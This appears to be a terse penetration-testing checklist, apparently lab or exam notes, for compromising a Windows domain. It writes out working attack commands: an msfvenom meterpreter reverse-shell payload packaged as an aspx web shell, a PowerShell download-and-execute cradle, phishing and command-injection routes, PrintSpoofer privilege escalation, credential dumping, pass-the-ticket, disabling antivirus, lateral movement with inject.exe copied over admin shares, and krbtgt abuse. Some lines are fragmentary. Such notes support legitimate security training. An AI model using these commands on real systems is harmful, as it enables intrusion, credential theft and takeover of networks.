Checklist / Flow
Last updated
Last updated
Enumeration, also check for 5985/5986 for evil-winrm
sudo nmap -A -sC -Pn 192.168.120.130-132 -vv
Check web ser:
email present = phishing with doc / hta
command utilities / debug page = cmd injection RCE with rev.ps1
upload available = web shell (e.g. aspx)
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 -f aspx -o /home/kali/met.aspx
+ +
finding upload dir:
gobuster dir -e -u http://192.168.120.132/ -w /usr/share/wordlists/dirb/common.txt
Post-Exploit Enum
QoL: meterpreter - execute -H -f notepad -> migrate
Check:
to run
(new-object system.net.webclient).downloadstring('http://192.168.119.120/powerview.ps1') | IEX
Get-DomainComputer, Get-DomainUser, Get-DomainGroup, Kerberos delegation
Privilege Escalation, printspoofer when service account
Dump , (meterpreter upload download), enum for config files, custom files etc.
Use the credentials to perform possible
Possibly became the admin user on a vulnerable ser PtT with impersonated tix > disable AV
Transfer files through shares (controlled host 1 to newly compromised host 2):
copy C:\inetpub\wwwroot\upload\inject.exe \\file01\c$
use with to control host 2 from host 1
copy c:\inject.exe \\dc02\c$ -> lat.exe dc02 sensorservice C:\inject.exe
Repeat cred dumps..., possible to look for
when compromised domain for other account access, with krbtgt of the dc